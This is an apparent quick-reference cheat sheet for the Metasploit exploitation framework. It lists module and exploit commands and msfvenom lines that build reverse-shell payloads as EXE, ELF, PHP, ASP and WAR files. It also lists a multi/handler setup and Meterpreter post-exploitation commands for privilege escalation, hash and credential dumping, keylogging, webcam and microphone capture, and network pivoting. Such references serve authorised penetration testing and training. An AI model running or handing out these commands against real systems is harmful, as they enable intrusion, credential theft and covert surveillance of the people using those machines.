Quick Reference

Exploitation framework commands, payloads, and Meterpreter reference.

๐Ÿš€ Starting Metasploit

Start consolemsfconsole
Quiet modemsfconsole -q
Init databasemsfdb init
Start databasemsfdb start
Check DB statusdb_status
Run scriptmsfconsole -r script.rc
Update MSFmsfupdate

๐Ÿ“‹ Basic Commands

Search modulessearch type:exploit smb
Search by CVEsearch cve:2017-0144
Use moduleuse exploit/windows/smb/...
Module infoinfo
Show optionsshow options
Set optionset RHOSTS 10.0.0.10
Global setsetg LHOST 10.0.0.5
Run exploitexploit or run
Run as jobexploit -j
Go backback

๐Ÿ’ฃ Common Payloads

Win x64 Meterpreterwindows/x64/meterpreter/reverse_tcp
Win x86 Meterpreterwindows/meterpreter/reverse_tcp
Linux Meterpreterlinux/x64/meterpreter/reverse_tcp
Windows Shellwindows/shell/reverse_tcp
PHP Meterpreterphp/meterpreter/reverse_tcp
Java Meterpreterjava/meterpreter/reverse_tcp

Staged (/) = smaller, needs handler | Stageless (_) = larger, standalone

๐Ÿ’ป Meterpreter - System

System infosysinfo
Current usergetuid
Get PIDgetpid
List processesps
Migrate to PIDmigrate PID
Elevate privsgetsystem
Dump hasheshashdump
Load Kiwiload kiwi
All credentialscreds_all

๐Ÿ“ Meterpreter - Files

Working dirpwd
Change dircd C:\\
List filesls
Read filecat file.txt
Downloaddownload file.txt /local/
Uploadupload local.txt C:\\
Edit fileedit file.txt
Searchsearch -f *.txt

๐ŸŒ Meterpreter - Network

IP configipconfig
Routesroute
Port forwardportfwd add -l 8080 -p 80 -r IP
List forwardsportfwd list
ARP scanrun arp_scanner -r 10.0.0.0/24
Route addrun autoroute -s 10.0.0.0/24

๐ŸŽญ Post-Exploitation

Screenshotscreenshot
Start keyloggerkeyscan_start
Dump keystrokeskeyscan_dump
Webcam snapwebcam_snap
Record micrecord_mic
Shellshell
Backgroundbackground
Sessions listsessions -l
Interactsessions -i 1

๐Ÿงช msfvenom Payloads

Windows EXEmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe
Linux ELFmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell
PHPmsfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php
ASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f asp -o shell.asp
WARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war
Pythonmsfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw

๐Ÿ“ก Multi Handler Setup

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j